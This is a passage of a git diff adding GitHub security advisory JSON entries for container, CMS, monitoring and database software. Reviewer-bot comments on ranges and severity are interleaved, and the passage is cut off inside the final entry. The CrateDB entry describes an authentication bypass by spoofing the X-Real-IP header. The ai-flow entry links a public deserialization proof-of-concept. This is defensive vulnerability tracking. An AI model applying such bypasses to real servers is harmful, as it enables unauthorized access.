@@ -0,0 +1,121 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6g2q-w5j3-fwh4", + "modified": "2024-01-31T23:22:45Z", + "published": "2024-01-31T23:22:45Z", + "aliases": [ + "CVE-2021-21334" + ], + "summary": "containerd environment variable leak", + "details": "## Impact\n\nContainers launched through containerd's CRI implementation (through Kubernetes, crictl, or any other pod/container client that uses the containerd CRI service) that share the same image may receive incorrect environment variables, including values that are defined for other containers. If the affected containers have different security contexts, this may allow sensitive information to be unintentionally shared.\n\nIf you are not using containerd’s CRI implementation (through one of the mechanisms described above), you are not vulnerable to this issue.\n\nIf you are not launching multiple containers or Kubernetes pods from the same image which have different environment variables, you are not vulnerable to this issue.\n\nIf you are not launching multiple containers or Kubernetes pods from the same image in rapid succession, you have reduced likelihood of being vulnerable to this issue\n\n## Patches\n\nThis vulnerability has been fixed in containerd 1.3.10 and containerd 1.4.4. 
Users should update to these versions as soon as they are released.\n\n## Workarounds\n\nThere are no known workarounds.\n\n## For more information\n\nIf you have any questions or comments about this advisory:\n\n* [Open an issue](https://github.com/containerd/containerd/issues/new/choose)\n* Email us at security@containerd.io if you think you’ve found a security bug.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/containerd/containerd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.4.0" + }, + { + "fixed": "1.4.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/containerd/containerd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "1.3.10" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/containerd/containerd/security/advisories/GHSA-6g2q-w5j3-fwh4" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21334" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/cri/pull/1628" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/cri/pull/1629" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/containerd/commit/05f951a3781f4f2c1911b05e61c160e9c30eaa8e" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/containerd/commit/2d9c8aa4b3f4313982c5c999af57212a1c5d144b" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/containerd/commit/cbcb2f57fbe221986f96b552855eb802f63193de" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/containerd/releases/tag/v1.3.10" + }, + { + "type": "WEB", + "url": "https://github.com/containerd/containerd/releases/tag/v1.4.4" + }, + { + "type": "WEB", + "url": 
"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KUE2Z2ZUWBHRU36ZGBD2YSJCYB6ELPXE/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QIBPKSX5IOWPM3ZPFB3JVLXWDHSZTTWT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VTXHA5JOWQRCCUZH7ZQBEYN6KZKJEYSD/" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202105-33" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200", + "CWE-668" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:22:45Z", + "nvd_published_at": "2021-03-10T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-6hwg-w5jg-9c6x/GHSA-6hwg-w5jg-9c6x.json b/advisories/github-reviewed/2024/01/GHSA-6hwg-w5jg-9c6x/GHSA-6hwg-w5jg-9c6x.json new file mode 100644 index 0000000000000..d8a6f9c5f452f --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-6hwg-w5jg-9c6x/GHSA-6hwg-w5jg-9c6x.json 
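Review bot: The two containerd affected ranges are listed newest-first (`1.4.0`→`1.4.4` before `0`→`1.3.10`), whereas the other multi-range advisories in this commit (consul, moby) list them ascending; OSV consumers do not care about order, but a consistent order keeps the generated diffs easy to review. The lower range also starts at `"introduced": "0"` although the details attribute the bug to the CRI implementation and only name 1.3.10 and 1.4.4 as fixes; if the defect arrived with a specific containerd release, tightening that lower bound would avoid flagging 1.2.x users who may not be affected.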
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6hwg-w5jg-9c6x", + "modified": "2024-01-31T23:13:10Z", + "published": "2024-01-31T23:13:10Z", + "aliases": [ + "CVE-2020-27534" + ], + "summary": "Path Traversal in Moby builder", + "details": "util/binfmt_misc/check.go in Builder in Docker Engine before 19.03.9 calls os.OpenFile with a potentially unsafe qemu-check temporary pathname, constructed with an empty first argument in an ioutil.TempDir call.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "19.03.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-27534" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/pull/1462" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/pull/40877" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1921154" + }, + { + "type": "WEB", + "url": "http://web.archive.org/web/20200530054359/https://docs.docker.com/engine/release-notes/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:13:10Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-6m72-467w-94rh/GHSA-6m72-467w-94rh.json b/advisories/github-reviewed/2024/01/GHSA-6m72-467w-94rh/GHSA-6m72-467w-94rh.json new file mode 100644 index 0000000000000..afdb7960c63d4 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-6m72-467w-94rh/GHSA-6m72-467w-94rh.json 
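Review bot: Only `github.com/moby/moby` is listed as affected, yet the details locate the bug in `util/binfmt_misc/check.go` of the builder and the references include `moby/buildkit` PR 1462 alongside `moby/moby` PR 40877; BuildKit is vendored into moby but is also consumed directly as a module, so an additional affected entry for `github.com/moby/buildkit` with its own fixed version seems warranted if the fix landed there. The fixed version `"19.03.9"` is also written with the Docker-style leading zero, while the other moby advisories in this commit use `"19.3.15"`; semver-based matching treats these differently, so one convention should be used across the moby entries.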
@@ -0,0 +1,112 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6m72-467w-94rh", + "modified": "2024-01-31T23:11:32Z", + "published": "2024-01-31T23:11:32Z", + "aliases": [ + "CVE-2020-28053" + ], + "summary": "Privilege Escalation in HashiCorp Consul", + "details": "HashiCorp Consul and Consul Enterprise 1.2.0 up to 1.8.5 allowed operators with operator:read ACL permissions to read the Connect CA private key configuration. Fixed in 1.6.10, 1.7.10, and 1.8.6.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/consul" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.2.0" + }, + { + "fixed": "1.6.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/consul" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.7.0" + }, + { + "fixed": "1.7.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/hashicorp/consul" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "1.8.0" + }, + { + "fixed": "1.8.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-28053" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/consul/pull/9240" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/consul/commit/ff5215d882ac51b49c2647aac46b42aa9c890ce3" + }, + { + "type": "WEB", + "url": "https://github.com/hashicorp/consul/blob/master/CHANGELOG.md#186-november-19-2020" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202208-09" + }, + { + "type": "WEB", + "url": "https://www.hashicorp.com/blog/category/consul" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732", + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": 
"2024-01-31T23:11:32Z", + "nvd_published_at": "2020-11-23T14:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-6p78-f7h9-6838/GHSA-6p78-f7h9-6838.json b/advisories/github-reviewed/2024/01/GHSA-6p78-f7h9-6838/GHSA-6p78-f7h9-6838.json new file mode 100644 index 0000000000000..f16a006ecde6f --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-6p78-f7h9-6838/GHSA-6p78-f7h9-6838.json 
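Review bot: The summary "Privilege Escalation in HashiCorp Consul" does not match the details, which describe operator:read ACL holders being able to read the Connect CA private key configuration — an information-disclosure issue, consistent with the `C:H/I:N/A:N` vector. A summary such as `"summary": "HashiCorp Consul exposes Connect CA private key to operator:read ACL holders"` would triage more accurately, and adding `"CWE-200"` alongside CWE-732/CWE-863 would reflect the disclosure impact. The final reference, `https://www.hashicorp.com/blog/category/consul`, is a blog category index rather than an advisory and is unlikely to stay relevant; the CHANGELOG link above it already anchors the fix.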
@@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6p78-f7h9-6838", + "modified": "2024-02-05T23:06:18Z", + "published": "2024-01-30T09:30:34Z", + "aliases": [ + "CVE-2023-36260" + ], + "summary": "Craft CMS Feed-Me", + "details": "An issue discovered in Craft CMS version 4.6.1.1 allows remote attackers to cause a denial of service (DoS) via crafted string to Feed-Me Name and Feed-Me URL fields due to saving a feed using an Asset element type with no volume selected.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "craftcms/cms" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.6.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36260" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/feed-me/commit/b5d6ede51848349bd91bc95fec288b6793f15e28" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/feed-me/commit/b5d6ede51848349bd91bc95fec288b6793f15e28%29" + }, + { + "type": "PACKAGE", + "url": "https://github.com/craftcms/feed-me" + }, + { + "type": "WEB", + "url": "https://github.com/craftcms/feed-me/releases/tag/4.6.2" + }, + { + "type": "WEB", + "url": "https://www.linkedin.com/pulse/threat-briefing-craftcms-amrcybersecurity-emi0e/?trackingId=E75GttWvQp6gfvPiJDDUBA%3D%3D" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T18:42:48Z", + "nvd_published_at": "2024-01-30T09:15:47Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-6wh2-8hw7-jw94/GHSA-6wh2-8hw7-jw94.json b/advisories/github-reviewed/2024/01/GHSA-6wh2-8hw7-jw94/GHSA-6wh2-8hw7-jw94.json new file mode 100644 index 0000000000000..431d3bc8716a8 --- /dev/null 
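Review bot: The affected package is `craftcms/cms` with `"fixed": "4.6.2"`, but the summary, the PACKAGE reference and every fix reference point at the Feed Me plugin (`craftcms/feed-me`, release tag 4.6.2, the b5d6ede commit), so the range as written would flag every Craft CMS core install below 4.6.2 rather than the plugin. Assuming the fix is in the plugin, the entry should name the plugin's Packagist package, `"name": "craftcms/feed-me"`, keeping the 4.6.2 fixed event. The duplicate commit reference whose URL ends in `%29` is a scraped trailing `)` and can be dropped.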
+++ b/advisories/github-reviewed/2024/01/GHSA-6wh2-8hw7-jw94/GHSA-6wh2-8hw7-jw94.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6wh2-8hw7-jw94", + "modified": "2024-01-30T23:47:50Z", + "published": "2024-01-30T23:47:50Z", + "aliases": [ + "CVE-2018-18625" + ], + "summary": "Grafana XSS via adding a link in General feature", + "details": "Grafana 5.3.1 has XSS via a link on the \"Dashboard > All Panels > General\" screen. NOTE: this issue exists because of an incomplete fix for CVE-2018-12099.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/grafana/grafana" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.0.0-beta1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2018-18625" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/11813" + }, + { + "type": "WEB", + "url": "https://github.com/grafana/grafana/pull/14984" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20200608-0008/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:47:50Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-7452-xqpj-6rpc/GHSA-7452-xqpj-6rpc.json b/advisories/github-reviewed/2024/01/GHSA-7452-xqpj-6rpc/GHSA-7452-xqpj-6rpc.json new file mode 100644 index 0000000000000..c69928eddc2c6 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-7452-xqpj-6rpc/GHSA-7452-xqpj-6rpc.json 
@@ -0,0 +1,104 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7452-xqpj-6rpc", + "modified": "2024-01-31T23:14:25Z", + "published": "2024-01-31T23:14:25Z", + "aliases": [ + "CVE-2021-21284" + ], + "summary": "moby Access to remapped root allows privilege escalation to real root", + "details": "### Impact\n\nWhen using `--userns-remap`, if the root user in the remapped namespace has access to the host filesystem they can modify files under `/var/lib/docker/` that cause writing files with extended privileges.\n\n### Patches\n\nVersions 20.10.3 and 19.03.15 contain patches that prevent privilege escalation from remapped user.\n\n### Credits\n\nMaintainers would like to thank Alex Chapman for discovering the vulnerability; @awprice, @nathanburrell, @raulgomis, @chris-walz, @erin-jensby, @bassmatt, @mark-adams, @dbaxa for working on it and Zac Ellis for responsibly disclosing it to security@docker.com", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "19.3.15" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "20.10.0-beta1" + }, + { + "fixed": "20.10.3" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/moby/security/advisories/GHSA-7452-xqpj-6rpc" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-21284" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/64bd4485b3a66a597c02c95f5776395e540b2c7c" + }, + { + "type": "WEB", + "url": "https://docs.docker.com/engine/release-notes/#20103" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/releases/tag/v19.03.15" + }, + { + "type": "WEB", + 
"url": "https://github.com/moby/moby/releases/tag/v20.10.3" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202107-23" + }, + { + "type": "WEB", + "url": "https://security.netapp.com/advisory/ntap-20210226-0005/" + }, + { + "type": "WEB", + "url": "https://www.debian.org/security/2021/dsa-4865" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T23:14:25Z", + "nvd_published_at": "2021-02-02T18:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-7j98-74jh-cjxh/GHSA-7j98-74jh-cjxh.json b/advisories/github-reviewed/2024/01/GHSA-7j98-74jh-cjxh/GHSA-7j98-74jh-cjxh.json index 172eae6fc3ae0..1ca15e1d8bbd5 100644 --- a/advisories/github-reviewed/2024/01/GHSA-7j98-74jh-cjxh/GHSA-7j98-74jh-cjxh.json +++ b/advisories/github-reviewed/2024/01/GHSA-7j98-74jh-cjxh/GHSA-7j98-74jh-cjxh.json @@ -60,6 +60,10 @@ "type": "PACKAGE", "url": "https://github.com/xsuchy/templated-dictionary" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NBFYREAJH4T7GXXQZ4GJEREN4Q3AHS3K/" + }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2024/01/16/1" diff --git a/advisories/github-reviewed/2024/01/GHSA-7mgg-3rq2-hff4/GHSA-7mgg-3rq2-hff4.json b/advisories/github-reviewed/2024/01/GHSA-7mgg-3rq2-hff4/GHSA-7mgg-3rq2-hff4.json new file mode 100644 index 0000000000000..d31b296fac250 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-7mgg-3rq2-hff4/GHSA-7mgg-3rq2-hff4.json 
@@ -0,0 +1,73 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mgg-3rq2-hff4", + "modified": "2024-02-02T18:10:22Z", + "published": "2024-01-27T12:30:25Z", + "aliases": [ + "CVE-2024-0960" + ], + "summary": "ai-flow Deserialization of Untrusted Data vulnerability", + "details": "A vulnerability was found in flink-extended ai-flow 0.3.1. It has been declared as critical. Affected by this vulnerability is the function cloudpickle.loads of the file `\\ai_flow\\cli\\commands\\workflow_command.py`. The manipulation leads to deserialization. The attack can be launched remotely. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-252205 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "ai-flow" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "0.3.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0960" + }, + { + "type": "WEB", + "url": "https://github.com/bayuncao/vul-cve-8" + }, + { + "type": "WEB", + "url": "https://github.com/bayuncao/vul-cve-8/blob/main/dataset.pkl" + }, + { + "type": "PACKAGE", + "url": "https://github.com/flink-extended/ai-flow" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252205" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252205" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-502" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-02T18:10:22Z", + "nvd_published_at": "2024-01-27T12:15:07Z" + } +} \ No newline at end of file 
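Review bot: The severity fields undersell what `details` describes: `cloudpickle.loads` on attacker-supplied data is arbitrary code execution in the process, yet the vector ends in `C:L/I:L/A:L` (MODERATE), which looks carried over from the VulDB estimate rather than assessed against the deserialization sink. If that triage is confirmed, `"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"` with `"severity": "HIGH"` would match the CWE-502 classification. The range uses `last_affected` with no `fixed` event, so the details should state plainly that no patched release is known and that the only mitigation is not loading workflow/pickle files from untrusted sources. Note also that the references link directly to the PoC payload (`dataset.pkl`); readers should be told to treat it as hostile.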
diff --git a/advisories/github-reviewed/2024/01/GHSA-7mgx-gvjw-m3w3/GHSA-7mgx-gvjw-m3w3.json b/advisories/github-reviewed/2024/01/GHSA-7mgx-gvjw-m3w3/GHSA-7mgx-gvjw-m3w3.json new file mode 100644 index 0000000000000..d0cbf302654f5 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-7mgx-gvjw-m3w3/GHSA-7mgx-gvjw-m3w3.json 
@@ -0,0 +1,142 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mgx-gvjw-m3w3", + "modified": "2024-01-31T12:37:36Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2023-51982" + ], + "summary": "CrateDB authentication bypass vulnerability", + "details": "CrateDB 5.5.1 is contains an authentication bypass vulnerability in the Admin UI component. After configuring password authentication and_ Local_ In the case of an address, identity authentication can be bypassed by setting the X-Real IP request header to a specific value and accessing the Admin UI directly using the default user identity.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "5.2.11" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.3.0" + }, + { + "fixed": "5.3.8" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.4.0" + }, + { + "fixed": "5.4.7" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.crate:crate" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.5.0" + }, + { + "fixed": "5.5.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51982" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/issues/15231" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/pull/15234" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/0c166ef083bec4d64dd55c1d8cb9b3dec350d241" + }, + { + "type": "WEB", + "url": 
"https://github.com/crate/crate/commit/5be7b3864137c23305ece10df3f7c311ee50ae4d" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/b8b4cec49a1c7eb2b5af568400bd571d194dc03e" + }, + { + "type": "WEB", + "url": "https://github.com/crate/crate/commit/da59311ca920743ebc58ee64c29cfe5723487f56" + }, + { + "type": "PACKAGE", + "url": "https://github.com/crate/crate" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/crate/PYSEC-2024-27.yaml" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-287" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T18:43:26Z", + "nvd_published_at": "2024-01-30T01:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-7xm8-wjq7-88r5/GHSA-7xm8-wjq7-88r5.json b/advisories/github-reviewed/2024/01/GHSA-7xm8-wjq7-88r5/GHSA-7xm8-wjq7-88r5.json new file mode 100644 index 0000000000000..f6d860faa5560 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-7xm8-wjq7-88r5/GHSA-7xm8-wjq7-88r5.json 
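Review bot: The `details` text is garbled machine translation ("is contains", "and_ Local_ In the case of an address") and names only 5.5.1, while `affected` covers four release lines, so a reader cannot tell what the precondition actually is. A rewrite staying within what the referenced issue and commits support: `CrateDB before 5.2.11, 5.3.8, 5.4.7 and 5.5.2 trusts the X-Real-IP request header when deciding whether an Admin UI request comes from a local address. With password authentication configured and a host-based authentication rule for local addresses (presumably an auth.host_based entry with address _local_), an unauthenticated remote client can set X-Real-IP to a local value and use the Admin UI as the default user.` Adding that `X-Real-IP` must only be honoured behind a trusted reverse proxy is the operational caveat operators want.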
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7xm8-wjq7-88r5", + "modified": "2024-02-06T20:29:19Z", + "published": "2024-01-29T21:30:27Z", + "aliases": [ + "CVE-2023-51839" + ], + "summary": "DeviceFarmer stf uses DES-ECB", + "details": "DeviceFarmer stf v3.6.6 suffers from Use of a Broken or Risky Cryptographic Algorithm.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@devicefarmer/stf" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "3.6.6" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51839" + }, + { + "type": "WEB", + "url": "https://github.com/DeviceFarmer/stf/issues/736" + }, + { + "type": "PACKAGE", + "url": "https://github.com/DeviceFarmer/stf" + }, + { + "type": "WEB", + "url": "https://github.com/DeviceFarmer/stf/blob/a6b5f18941d0de5929f9c24c3ce3e9c13317a653/lib/util/vncauth.js#L35" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/CVE-2023-51839.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-327" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T20:29:19Z", + "nvd_published_at": "2024-01-29T20:15:15Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-86rg-pf4c-5grg/GHSA-86rg-pf4c-5grg.json b/advisories/github-reviewed/2024/01/GHSA-86rg-pf4c-5grg/GHSA-86rg-pf4c-5grg.json new file mode 100644 index 0000000000000..a3851dcfd5146 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-86rg-pf4c-5grg/GHSA-86rg-pf4c-5grg.json 
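Review bot: The reference points at `lib/util/vncauth.js#L35`, which from its name implements the VNC authentication challenge-response, and that scheme (RFC 6143 §7.2.2) mandates single DES in ECB mode over a 16-byte challenge — there is no protocol-compliant alternative. If that is the usage, the CRITICAL `C:H/I:H` rating and the one-line details overstate it: the weakness belongs to the VNC protocol, and the practical advice is to keep the VNC port unreachable except through stf's own tunnel/TLS. The details should say what is encrypted with DES and whether a fix exists; since the range only has `last_affected: 3.6.6`, state explicitly that no patched release is known.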
@@ -0,0 +1,82 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-86rg-pf4c-5grg", + "modified": "2024-02-05T17:59:41Z", + "published": "2024-01-04T12:30:20Z", + "aliases": [ + "CVE-2023-6944" + ], + "summary": "@backstage/backend-app-api leaks GitLab access tokens", + "details": "A flaw was found in the Red Hat Developer Hub (RHDH). The catalog-import function leaks GitLab access tokens on the frontend when the base64 encoded GitLab token includes a newline at the end of the string. The sanitized error can display on the frontend, including the raw access token. Upon gaining access to this token and depending on permissions, an attacker could push malicious code to repositories, delete resources in Git, revoke or generate new keys, and sign code illegitimately.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@backstage/backend-app-api" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.5.9-next.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6944" + }, + { + "type": "WEB", + "url": "https://github.com/backstage/backstage/issues/21503" + }, + { + "type": "WEB", + "url": "https://github.com/backstage/backstage/pull/21582" + }, + { + "type": "WEB", + "url": "https://github.com/backstage/backstage/commit/0382db60f6c8e8715a702bde6408ad10a48d8e11" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6944" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2255204" + }, + { + "type": "PACKAGE", + "url": "https://github.com/backstage/backstage" + }, + { + "type": "WEB", + "url": "https://github.com/backstage/backstage/blob/master/docs/releases/v1.21.0-next.2-changelog.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200", + "CWE-209" + ], + 
